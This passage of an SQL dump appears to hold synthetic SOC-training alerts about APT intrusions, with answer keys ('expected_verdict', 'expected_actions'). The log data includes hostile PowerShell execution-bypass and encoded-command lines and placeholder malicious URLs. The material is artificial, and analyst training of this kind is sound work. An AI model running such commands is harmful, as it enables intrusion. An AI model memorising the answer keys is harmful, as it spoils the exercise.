3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:05:32Z\\\",\\\"event_id\\\":\\\"DLP123456\\\",\\\"source_ip\\\":\\\"192.168.1.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"classified_defense_project_v2.pdf\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"allowed\\\",\\\"bytes_transferred\\\":10485760,\\\"dlp_policy\\\":\\\"Sensitive Data Movement\\\",\\\"dlp_rule\\\":\\\"Defense & Aerospace Keywords\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.860Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:05:32Z\\\",\\\"event_id\\\":\\\"DLP123456\\\",\\\"source_ip\\\":\\\"192.168.1.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"classified_defense_project_v2.pdf\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"allowed\\\",\\\"bytes_transferred\\\":10485760,\\\"dlp_policy\\\":\\\"Sensitive Data Movement\\\",\\\"dlp_rule\\\":\\\"Defense & Aerospace Keywords\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1136, 'Suspicious Blog Activity Detected', 'high', 'Web Traffic Logs', 'Initial Access operation detected through suspicious activity on high-traffic blogs. Analysts noticed unusual requests from known vulnerable blog platforms, signaling Blackgear\'s attempt to infiltrate Taiwan\'s digital landscape.', 'Initial Access', 'T1190: Exploit Public-Facing Application', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-01T14:23:45Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.25\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\",\"request_url\":\"http://vulnerable-blog.com/wp-content/plugins/exploit.php\",\"malware_hash\":\"a9b8c4d8e5f67a8b9cdef12345678901\",\"username\":\"admin\",\"referrer\":\"http://malicious-site.com\",\"status_code\":200}', '2026-02-01 14:02:14', '2026-02-23 20:09:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with Blackgear APT activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host targeted by external threat.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://vulnerable-blog.com/wp-content/plugins/exploit.php\",\"is_critical\":true,\"osint_result\":{\"source\":\"URL Reputation Service\",\"verdict\":\"suspicious\",\"details\":\"URL linked to recent exploit attempts.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"a9b8c4d8e5f67a8b9cdef12345678901\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to known Blackgear malware.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal 
Authentication Logs\",\"verdict\":\"internal\",\"details\":\"Common username targeted for exploitation.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'advanced', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.861Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.25\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\\\",\\\"request_url\\\":\\\"http://vulnerable-blog.com/wp-content/plugins/exploit.php\\\",\\\"malware_hash\\\":\\\"a9b8c4d8e5f67a8b9cdef12345678901\\\",\\\"username\\\":\\\"admin\\\",\\\"referrer\\\":\\\"http://malicious-site.com\\\",\\\"status_code\\\":200}\"},{\"timestamp\":\"2026-02-01T20:31:22.861Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.25\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\\\",\\\"request_url\\\":\\\"http://vulnerable-blog.com/wp-content/plugins/exploit.php\\\",\\\"malware_hash\\\":\\\"a9b8c4d8e5f67a8b9cdef12345678901\\\",\\\"username\\\":\\\"admin\\\",\\\"referrer\\\":\\\"http://malicious-site.com\\\",\\\"status_code\\\":200}\"},{\"timestamp\":\"2026-02-01T20:30:22.861Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.25\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\\\",\\\"request_url\\\":\\\"http://vulnerable-blog.com/wp-content/plugins/exploit.php\\\",\\\"malware_hash\\\":\\\"a9b8c4d8e5f67a8b9cdef12345678901\\\",\\\"username\\\":\\\"admin\\\",\\\"referrer\\\":\\\"http://malicious-site.com\\\",\\\"status_code\\\":200}\"},{\"timestamp\":\"2026-02-01T20:29:22.861Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.25\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\\\",\\\"request_url\\\":\\\"http://vulnerable-blog.com/wp-content/plugins/exploit.php\\\",\\\"malware_hash\\\":\\\"a9b8c4d8e5f67a8b9cdef12345678901\\\",\\\"username\\\":\\\"admin\\\",\\\"referrer\\\":\\\"http://malicious-site.com\\\",\\\"status_code\\\":200}\"},{\"timestamp\":\"2026-02-01T20:28:22.861Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.25\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\\\",\\\"request_url\\\":\\\"http://vulnerable-blog.com/wp-content/plugins/exploit.php\\\",\\\"malware_hash\\\":\\\"a9b8c4d8e5f67a8b9cdef12345678901\\\",\\\"username\\\":\\\"admin\\\",\\\"referrer\\\":\\\"http://malicious-site.com\\\",\\\"status_code\\\":200}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1137, 'Protux Backdoor Execution Attempt', 'high', 'Endpoint Detection and Response (EDR)', 'Following an established initial access, the Blackgear group attempts to execute the Protux backdoor to maintain persistent access to compromised government systems.', 'Execution', 'T1059.001 - Command and Scripting Interpreter: PowerShell', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-24T14:32:12Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.20.30.40\",\"destination_port\":5985,\"protocol\":\"TCP\",\"username\":\"j.doe\",\"process_name\":\"powershell.exe\",\"command_line\":\"powershell -ExecutionPolicy Bypass -NoProfile -File C:\\\\Windows\\\\Temp\\\\protux.ps1\",\"file_hash\":\"3f786850e387550fdab836ed7e6dc881de23001b\",\"filename\":\"protux.ps1\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"event_id\":4624,\"event_type\":\"Logon\",\"logon_type\":3,\"logon_process\":\"NtLmSsp\",\"domain\":\"government.local\"}', '2026-02-01 14:02:14', '2026-02-23 20:11:53', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDatabase\",\"verdict\":\"malicious\",\"details\":\"IP associated with Blackgear group activities\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.20.30.40\",\"is_critical\":false,\"osint_result\":{\"source\":\"InternalNetwork\",\"verdict\":\"internal\",\"details\":\"Internal government network IP\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3f786850e387550fdab836ed7e6dc881de23001b\",\"is_critical\":true,\"osint_result\":{\"source\":\"MalwareRepository\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to Protux backdoor script\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"protux.ps1\",\"is_critical\":true,\"osint_result\":{\"source\":\"FileAnalysisService\",\"verdict\":\"malicious\",\"details\":\"Known malicious script for Protux backdoor 
installation\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"InternalDirectory\",\"verdict\":\"clean\",\"details\":\"Legitimate user account\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1138, 'Backdoor Persistence Mechanism Identified', 'high', 'File Integrity Monitoring', 'The operation escalates as analysts identify persistence mechanisms employed by the Protux backdoor, designed to survive system reboots and evade detection. A suspicious file was detected which indicates a possible persistence mechanism used by the Protux malware.', 'Persistence', 'T1547.001', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-14T03:21:45Z\",\"event_id\":\"FIM-20231014-0045\",\"src_ip\":\"192.168.1.45\",\"attacker_ip\":\"203.0.113.5\",\"file_path\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"file_hash\":\"a34f8b9a5c1d4e7a8f9e2b4c6d5f8a7b\",\"username\":\"admin\",\"action\":\"File Created\",\"description\":\"Suspicious file creation detected in System32 directory, potentially related to persistence mechanism of Protux backdoor.\"}', '2026-02-01 14:02:14', '2026-02-23 20:12:37', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_lookup\",\"verdict\":\"internal\",\"details\":\"Internal host IP address.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known Protux backdoor activity.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"a34f8b9a5c1d4e7a8f9e2b4c6d5f8a7b\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"File hash matches known Protux backdoor sample.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"system_scan\",\"verdict\":\"suspicious\",\"details\":\"Unexpected file creation in a critical system 
directory.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_lookup\",\"verdict\":\"internal\",\"details\":\"Privileged user account involved.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.864Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-14T03:21:45Z\\\",\\\"event_id\\\":\\\"FIM-20231014-0045\\\",\\\"src_ip\\\":\\\"192.168.1.45\\\",\\\"attacker_ip\\\":\\\"203.0.113.5\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe\\\",\\\"file_hash\\\":\\\"a34f8b9a5c1d4e7a8f9e2b4c6d5f8a7b\\\",\\\"username\\\":\\\"admin\\\",\\\"action\\\":\\\"File Created\\\",\\\"description\\\":\\\"Suspicious file creation detected in System32 directory, potentially related to persistence mechanism of Protux backdoor.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.864Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-14T03:21:45Z\\\",\\\"event_id\\\":\\\"FIM-20231014-0045\\\",\\\"src_ip\\\":\\\"192.168.1.45\\\",\\\"attacker_ip\\\":\\\"203.0.113.5\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe\\\",\\\"file_hash\\\":\\\"a34f8b9a5c1d4e7a8f9e2b4c6d5f8a7b\\\",\\\"username\\\":\\\"admin\\\",\\\"action\\\":\\\"File Created\\\",\\\"description\\\":\\\"Suspicious file creation detected in System32 directory, potentially related to persistence mechanism of 
Protux backdoor.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.864Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-14T03:21:45Z\\\",\\\"event_id\\\":\\\"FIM-20231014-0045\\\",\\\"src_ip\\\":\\\"192.168.1.45\\\",\\\"attacker_ip\\\":\\\"203.0.113.5\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe\\\",\\\"file_hash\\\":\\\"a34f8b9a5c1d4e7a8f9e2b4c6d5f8a7b\\\",\\\"username\\\":\\\"admin\\\",\\\"action\\\":\\\"File Created\\\",\\\"description\\\":\\\"Suspicious file creation detected in System32 directory, potentially related to persistence mechanism of Protux backdoor.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.864Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-14T03:21:45Z\\\",\\\"event_id\\\":\\\"FIM-20231014-0045\\\",\\\"src_ip\\\":\\\"192.168.1.45\\\",\\\"attacker_ip\\\":\\\"203.0.113.5\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe\\\",\\\"file_hash\\\":\\\"a34f8b9a5c1d4e7a8f9e2b4c6d5f8a7b\\\",\\\"username\\\":\\\"admin\\\",\\\"action\\\":\\\"File Created\\\",\\\"description\\\":\\\"Suspicious file creation detected in System32 directory, potentially related to persistence mechanism of Protux backdoor.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.864Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-14T03:21:45Z\\\",\\\"event_id\\\":\\\"FIM-20231014-0045\\\",\\\"src_ip\\\":\\\"192.168.1.45\\\",\\\"attacker_ip\\\":\\\"203.0.113.5\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe\\\",\\\"file_hash\\\":\\\"a34f8b9a5c1d4e7a8f9e2b4c6d5f8a7b\\\",\\\"username\\\":\\\"admin\\\",\\\"action\\\":\\\"File Created\\\",\\\"description\\\":\\\"Suspicious file creation detected in System32 directory, potentially related to persistence mechanism of Protux backdoor.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1139, 'Lateral Movement via Credential Dumping', 'critical', 'Network Traffic Analysis', 'Blackgear APT group is leveraging stolen credentials to move laterally within the telecommunications infrastructure, targeting sensitive systems to expand their network access.', 'Lateral Movement', 'T1003 - Credential Dumping', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"source_ip\":\"10.0.5.34\",\"destination_ip\":\"192.168.14.76\",\"attacker_ip\":\"203.0.113.45\",\"user_account\":\"jdoe_admin\",\"malware_hash\":\"a1b2c3d4e5f67890123456789abcdef0\",\"filename\":\"lsass_dump.dmp\",\"event\":\"Credential Dumping Detected\",\"protocol\":\"SMB\",\"action\":\"Attempted Lateral Movement\"}', '2026-02-01 14:02:14', '2026-02-16 12:26:00', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP known to be associated with Blackgear APT group activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.14.76\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"Internal server targeted for lateral movement.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"a1b2c3d4e5f67890123456789abcdef0\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known credential dumping malware.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe_admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"internal\",\"details\":\"Compromised administrative account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1140, 'Data Exfiltration to External Servers', 'critical', 'Data Loss Prevention (DLP) Systems', 'The culmination of Blackgear\'s campaign sees them attempting to exfiltrate valuable intelligence, using encrypted channels to obscure their tracks. Analysts must act swiftly to prevent data loss and mitigate the impact.', 'Exfiltration', 'T1048', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-20T14:22:34Z\",\"event_id\":\"exfiltration_12345\",\"source_ip\":\"10.0.15.23\",\"destination_ip\":\"203.0.113.45\",\"protocol\":\"HTTPS\",\"data_volume\":\"1.2 GB\",\"file_name\":\"confidential_report.pdf\",\"file_hash\":\"3e7a1f85b1d4f6c2e4a77f7e9a9f4c3b\",\"user\":\"jdoe\",\"action\":\"data_transfer\",\"encryption_used\":true,\"alert\":true}', '2026-02-01 14:02:14', '2026-02-16 17:47:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.15.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised system.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"public\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with Blackgear APT.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"confidential_report.pdf\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Sensitive file potentially exfiltrated.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"3e7a1f85b1d4f6c2e4a77f7e9a9f4c3b\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"File hash identified in exfiltration attempt.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.867Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:22:34Z\\\",\\\"event_id\\\":\\\"exfiltration_12345\\\",\\\"source_ip\\\":\\\"10.0.15.23\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"data_volume\\\":\\\"1.2 GB\\\",\\\"file_name\\\":\\\"confidential_report.pdf\\\",\\\"file_hash\\\":\\\"3e7a1f85b1d4f6c2e4a77f7e9a9f4c3b\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"data_transfer\\\",\\\"encryption_used\\\":true,\\\"alert\\\":true}\"},{\"timestamp\":\"2026-02-01T20:31:22.867Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:22:34Z\\\",\\\"event_id\\\":\\\"exfiltration_12345\\\",\\\"source_ip\\\":\\\"10.0.15.23\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"data_volume\\\":\\\"1.2 GB\\\",\\\"file_name\\\":\\\"confidential_report.pdf\\\",\\\"file_hash\\\":\\\"3e7a1f85b1d4f6c2e4a77f7e9a9f4c3b\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"data_transfer\\\",\\\"encryption_used\\\":true,\\\"alert\\\":true}\"},{\"timestamp\":\"2026-02-01T20:30:22.867Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:22:34Z\\\",\\\"event_id\\\":\\\"exfiltration_12345\\\",\\\"source_ip\\\":\\\"10.0.15.23\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"data_volume\\\":\\\"1.2 
GB\\\",\\\"file_name\\\":\\\"confidential_report.pdf\\\",\\\"file_hash\\\":\\\"3e7a1f85b1d4f6c2e4a77f7e9a9f4c3b\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"data_transfer\\\",\\\"encryption_used\\\":true,\\\"alert\\\":true}\"},{\"timestamp\":\"2026-02-01T20:29:22.867Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:22:34Z\\\",\\\"event_id\\\":\\\"exfiltration_12345\\\",\\\"source_ip\\\":\\\"10.0.15.23\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"data_volume\\\":\\\"1.2 GB\\\",\\\"file_name\\\":\\\"confidential_report.pdf\\\",\\\"file_hash\\\":\\\"3e7a1f85b1d4f6c2e4a77f7e9a9f4c3b\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"data_transfer\\\",\\\"encryption_used\\\":true,\\\"alert\\\":true}\"},{\"timestamp\":\"2026-02-01T20:28:22.867Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:22:34Z\\\",\\\"event_id\\\":\\\"exfiltration_12345\\\",\\\"source_ip\\\":\\\"10.0.15.23\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"data_volume\\\":\\\"1.2 GB\\\",\\\"file_name\\\":\\\"confidential_report.pdf\\\",\\\"file_hash\\\":\\\"3e7a1f85b1d4f6c2e4a77f7e9a9f4c3b\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"data_transfer\\\",\\\"encryption_used\\\":true,\\\"alert\\\":true}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1141, 'Initial Access - Spear Phishing Campaign', 'high', 'Email Security Gateway', 'A spear phishing email was sent to a Pakistani military official with a malicious attachment, aiming to gain initial access to the network.', 'Spear Phishing', 'T1566.001', 1, 'investigating', 74, '{\"timestamp\":\"2023-10-21T11:30:00Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.15.20.5\",\"email_subject\":\"Urgent: New Policy Updates\",\"email_sender\":\"john.doe@maliciousdomain.com\",\"email_recipient\":\"official@military.pk\",\"attachment_name\":\"Policy_Update.docx\",\"attachment_hash\":\"e99a18c428cb38d5f260853678922e03\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3\",\"url\":\"http://maliciousdomain.com/download\",\"indicator_of_compromise\":true}', '2026-02-01 14:02:29', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known spear phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware used by Patchwork APT.\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"john.doe@maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Email Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Email address involved in previous phishing 